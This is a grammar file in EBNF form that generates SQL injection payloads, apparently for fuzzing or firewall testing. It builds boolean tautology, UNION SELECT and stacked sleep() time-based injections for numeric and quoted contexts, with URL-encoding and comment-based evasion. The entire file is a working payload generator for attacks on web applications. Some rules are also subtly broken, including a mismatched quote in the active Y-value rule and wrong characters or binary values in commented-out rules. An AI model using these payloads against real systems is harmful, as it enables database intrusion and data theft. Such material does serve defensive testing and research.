terSQuote = "'" | "%27" ;
terDQuote = "\"" | "%22" ;
terDigitZero = "0" | "%30" | "0b0" | "0x0" ;
terDigitOne = "1" | "%31" | "0b1" | "0x1" ;
terDigitTwo = "2" | "%32" | "0b10" | "0x2" ;
terDigitThree = "3" | "%33" | "0b11" | "0x3" ;
terDigitFour = "4" | "%34" | "0b100" | "0x4" ;
terDigitFive = "5" | "%35" | "0b101" | "0x5" ;
terDigitSix = "6" | "%36" | "0b110" | "0x6" ;
terDigitSeven = "7" | "%37" | "0b111" | "0x7" ;
terDigitEight = "8" | "%38" | "0b1000" | "0x8" ;
terDigitNine = "9" | "%39" | "0b1001" | "0x9" ;
terDigitExcludingZero = terDigitOne | terDigitTwo | terDigitThree | terDigitFour | terDigitFive | terDigitSix | terDigitSeven | terDigitEight | terDigitNine ;
#terDigitIncludingZero = terDigitZero | terDigitExcludingZero ;

# some of these aren't referenced in the grammar
# I'm commenting them to make analysis easier
terCharA = "a" | "%61" | "A" | "%41";
terCharB = "b" | "%62" | "B" | "%42";
terCharC = "c" | "%63" | "C" | "%43";
terCharD = "d" | "%64" | "D" | "%44";
terCharE = "e" | "%65" | "E" | "%45";
terCharF = "f" | "%66" | "F" | "%46";
#terCharG = "g" | "%67" | "G" | "%47";
terCharH = "h" | "%68" | "H" | "%48";
terCharI = "i" | "%69" | "I" | "%49";
#terCharJ = "j" | "%6A" | "J" | "%4A";
terCharK = "k" | "%6B" | "K" | "%4B";
terCharL = "l" | "%6C" | "L" | "%4C";
#terCharM = "m" | "%6D" | "M" | "%4D";
terCharN = "n" | "%6E" | "N" | "%4E";
terCharO = "o" | "%6F" | "O" | "%4F";
#terCharP = "p" | "%70" | "P" | "%50";
#terCharQ = "q" | "%71" | "Q" | "%51";
terCharR = "r" | "%72" | "R" | "%52";
terCharS = "s" | "%73" | "S" | "%53";
terCharT = "t" | "%74" | "T" | "%54";
terCharU = "u" | "%75" | "U" | "%55";
#terCharV = "v" | "%76" | "V" | "%56";
#terCharW = "w" | "%77" | "W" | "%57";
#terCharX = "x" | "%78" | "X" | "%58";
terCharY = "y" | "%79" | "Y" | "%59";
terCharZ = "z" | "%7A" | "Z" | "%5A";

terCharAValue = terSQuote, terCharA, terSQuote | "0x61" | "x", terSQuote, "61", terSQuote | "0b1100001" | opChar, parOpen, "97", par;
terCharBValue = terSQuote, terCharB, terSQuote | "0x62" | "x", terSQuote, "62", terSQuote | "0b1100010" | opChar, parOpen, "98", par;
terCharCValue = terSQuote, terCharC, terSQuote | "0x63" | "x", terSQuote, "63", terSQuote | "0b1100011" | opChar, parOpen, "99", par;
terCharDValue = terSQuote, terCharD, terSQuote | "0x64" | "x", terSQuote, "64", terSQuote | "0b1100100" | opChar, parOpen, "100", par;
terCharEValue = terSQuote, terCharE, terSQuote | "0x65" | "x", terSQuote, "65", terSQuote | "0b1100101" | opChar, parOpen, "101", par;
#terCharFValue = terSQuote, terCharF, terSQuote | "0x66" | "x", terSQuote, "66", terSQuote | "0b1100110" | opChar, parOpen, "102", par;
#terCharGValue = terSQuote, terCharG, terSQuote | "0x67" | "x", terSQuote, "67", terSQuote | "0b1100111" | opChar, parOpen, "103", par;
#terCharHValue = terSQuote, terCharH, terSQuote | "0x68" | "x", terSQuote, "68", terSQuote | "0b1101000" | opChar, parOpen, "104", par;
#terCharIValue = terSQuote, terCharI, terSQuote | "0x69" | "x", terSQuote, "69", terSQuote | "0b1101001" | opChar, parOpen, "105", par;
#terCharJValue = terSQuote, terCharJ, terSQuote | "0x6A" | "x", terSQuote, "6A", terSQuote | "0b1101010" | opChar, parOpen, "106", par;
#terCharKValue = terSQuote, terCharK, terSQuote | "0x6B" | "x", terSQuote, "6B", terSQuote | "0b1101011" | opChar, parOpen, "107", par;
#terCharLValue = terSQuote, terCharL, terSQuote | "0x6C" | "x", terSQuote, "6C", terSQuote | "0b1101100" | opChar, parOpen, "108", par;
#terCharMValue = terSQuote, terCharO, terSQuote | "0x6D" | "x", terSQuote, "6D", terSQuote | "0b1101101" | opChar, parOpen, "109", par;
#terCharNValue = terSQuote, terCharM, terSQuote | "0x6E" | "x", terSQuote, "6E", terSQuote | "0b1101110" | opChar, parOpen, "110", par;
#terCharOValue = terSQuote, terCharN, terSQuote | "0x6F" | "x", terSQuote, "6F", terSQuote | "0b1101111" | opChar, parOpen, '111", par;
#terCharPValue = terSQuote, terCharP, terSQuote | "0x70" | "x", terSQuote, "70", terSQuote | "0b1110000" | opChar, parOpen, "112", par;
#terCharQValue = terSQuote, terCharQ, terSQuote | "0x71" | "x", terSQuote, "71", terSQuote | "0b1110001" | opChar, parOpen, "113", par;
#terCharRValue = terSQuote, terCharR, terSQuote | "0x72" | "x", terSQuote, "72", terSQuote | "0b1110011" | opChar, parOpen, "114", par;
#terCharSValue = terSQuote, terCharS, terSQuote | "0x73" | "x", terSQuote, "73", terSQuote | "0b1110100" | opChar, parOpen, "115", par;
#terCharTValue = terSQuote, terCharT, terSQuote | "0x74" | "x", terSQuote, "74", terSQuote | "0b1110101" | opChar, parOpen, "116", par;
#terCharUValue = terSQuote, terCharU, terSQuote | "0x75" | "x", terSQuote, "75", terSQuote | "0b1110110" | opChar, parOpen, "117", par;
#terCharVValue = terSQuote, terCharV, terSQuote | "0x76" | "x", terSQuote, "76", terSQuote | "0b1110110" | opChar, parOpen, "118", par;
#terCharWValue = terSQuote, terCharW, terSQuote | "0x77" | "x", terSQuote, "77", terSQuote | "0b1110111" | opChar, parOpen, "119", par;
#terCharXValue = terSQuote, terCharX, terSQuote | "0x78" | "x", terSQuote, "78", terSQuote | "0b1111000" | opChar, parOpen, "120", par;
terCharYValue = terSQuote, terCharY, terSQuote | "0x79" | "x", terSQuote, "79", terSQuote | "0b1111001" | opChar, parOpen, '121", par;
terCharZValue = terSQuote, terCharZ, terSQuote | "0x7A" | "x", terSQuote, "7A", terSQuote | "0b1111010" | opChar, parOpen, "122", par;

terCharSmallVal = terCharAValue | terCharBValue | terCharCValue | terCharDValue | terCharEValue ;
terCharLargeVal = terCharYValue | terCharZValue ;
terDigitSmallVal = terDigitZero | terDigitOne | terDigitTwo | terDigitThree | terDigitFour ;
terDigitLargeVal = terDigitFive | terDigitSix | terDigitSeven | terDigitEight | terDigitNine ;

#terChar = terCharA | terCharB | terCharC | terCharD | terCharE | terCharF | terCharG | terCharH | terCharI | terCharJ | terCharK | terCharL | terCharM | terCharN | terCharO | terCharP | terCharQ | terCharR | terCharS | terCharT | terCharU | terCharV | terCharW | terCharX | terCharY | terCharZ ;
#terCharNoQuote = opChar, parOpen, "97", par | "0x61" ; 
terNull = "%00" ;

# SQL Operators and Keyword
opNot = "!" | "%21" | terCharN, terCharO, terCharT ;
opBinInvert = "~" | "%7E" ;
opEqual = "=" | "%3D" ;
opLt = "<" | "%3C" ;
opGt = ">" | "%3E" ;
opLike = terCharL, terCharI, terCharK, terCharE ;
opIs = terCharI, terCharS ;
opMinus = "-" | "%2D";
opOr = terCharO, [inlineCmt], terCharR | "||" | "%7C%7C";
opAnd = terCharA, terCharN, terCharD | "&&" | "%26%26";
opSel = terCharS, terCharE, terCharL, terCharE, terCharC, terCharT ;
opUni = terCharU, terCharN, terCharI, terCharO, terCharN ;
opSem = ";" | "%3B" ;
#opConcat = "concat" ;
opChar = terCharC, terCharH, terCharA, terCharR ;

# SQL functions
parOpen = "(" | "%28" ;
funcSleep = "sleep" , parOpen , terDigitExcludingZero , par ;

# Syntax-repairing
par = ")" | "%29" ;
cmt = "#" | "--", blank | "%23"

# Obfuscation
inlineCmt = "/**/" ;
blank = " " | "%20" ;
wsp = blank | inlineCmt ;

### Boolean-based Attacks ### 

# boolean values which evaluate to true
trueConst = terCharT, terCharR, terCharU, terCharE ;
# trueConst = "true" ; 
trueAtom = trueConst | terDigitOne ;
unaryTrue = wsp, trueAtom | wsp, opNot, wsp, falseAtom | opBinInvert, wsp, falseAtom | wsp, opNot, wsp, opBinInvert, trueAtom ;
bT1 = unaryTrue, opEqual, wsp, parOpen, unaryTrue, par ;
bT2 = unaryFalse, opEqual, wsp, parOpen, unaryFalse, par ;
bT3 = terSQuote, terCharA, terSQuote, opEqual, terSQuote, terCharA, terSQuote ;
bT4 = terDQuote, terCharA, terDQuote, opEqual, terDQuote, terCharA, terDQuote ;
bT5 = unaryFalse, opLt, parOpen, unaryTrue, par ;
bT6 = unaryTrue, opGt, parOpen, unaryFalse, par ;
bT7 = wsp, trueAtom, wsp, opLike, wsp, trueAtom ;
bT8 = unaryTrue, wsp, opIs, wsp, trueConst ;
bT9 = unaryFalse, wsp, opIs, wsp, falseConst ;
bT10 = unaryTrue, opMinus, parOpen, unaryFalse, par ;
bT11 = terCharSmallVal, wsp, opLt, wsp, terCharLargeVal ;
bT12 = terCharLargeVal, wsp, opGt, wsp, terCharSmallVal ;
bT13 = terDigitSmallVal, wsp, opLt, wsp, terDigitLargeVal ;
bT14 = terDigitLargeVal, wsp, opGt, wsp, terDigitSmallVal ;
binaryTrue = bT1 | bT2 | bT3 | bT4 | bT5 | bT6 | bT7 | bT8 | bT9 | bT10 | bT11 | bT12 | bT13 | bT14 ;  
booleanTrueExpr = unaryTrue | binaryTrue ;

# boolean values which evaluate to false
falseConst = terCharF, terCharA, terCharL, terCharS, terCharE ;
# falseConst = "false" ;
falseAtom = wsp, falseConst |  wsp, terDigitZero | terSQuote, terSQuote ;
unaryFalse = falseAtom | wsp, opNot, wsp, trueAtom | wsp, opNot, opBinInvert, falseAtom | wsp, opBinInvert, trueAtom ;
bF1 = terSQuote, terCharA, terSQuote, opEqual, terSQuote, terCharB, terSQuote ;
bF2 = terCharSmallVal, wsp, opGt, wsp, terCharLargeVal ;
bF3 = terCharLargeVal, wsp, opLt, wsp, terCharSmallVal ;
bF4 = terDigitSmallVal, wsp, opGt, wsp, terDigitLargeVal ;
bF5 = terDigitLargeVal, wsp, opLt, wsp, terDigitSmallVal ;
bF6 = unaryTrue, opLt, parOpen, unaryFalse, par ;
binaryFalse = bF1 | bF2 | bF3 | bF4 | bF5 | bF6 ;
booleanFalseExpr = unaryFalse | binaryFalse;

orAttack = opOr, booleanTrueExpr ;
andAttack = opAnd, booleanFalseExpr ;
booleanAttack = orAttack | andAttack ;

### Union Attacks ###
cols = terDigitZero ;
unionPostfix = "all", wsp | "distinct", wsp ;
union = opUni | "/*!", ["50000"], opUni, "*/" ;
unionAttack = union, wsp, [unionPostfix], opSel, wsp, cols | union, wsp, [unionPostfix] , parOpen, opSel, wsp, cols,par ;

### Piggy-backed Attacks ###
piggyAttack = opSem, opSel, wsp, funcSleep ;

### Injection Context ###
sqliAttack = unionAttack | piggyAttack | booleanAttack ;

numericContext = [terNull], terDigitZero, wsp, booleanAttack, wsp | [terNull], terDigitZero, par, wsp, booleanAttack, wsp, opOr, parOpen, terDigitZero | [terNull], terDigitZero, [par], wsp, sqliAttack, cmt ;
sQuoteContext = [terNull], terSQuote, wsp, booleanAttack, wsp, opOr, terSQuote | [terNull], terSQuote, par, wsp, booleanAttack, wsp, opOr, parOpen, terSQuote | [terNull], terSQuote, [par], wsp, sqliAttack, cmt ;
dQuoteContext = [terNull], terDQuote, wsp, booleanAttack, wsp, opOr, terDQuote | [terNull], terDQuote, par, wsp, booleanAttack, wsp, opOr, parOpen, terDQuote | [terNull], terDQuote, [par], wsp, sqliAttack, cmt ;

start = numericContext | sQuoteContext | dQuoteContext ;
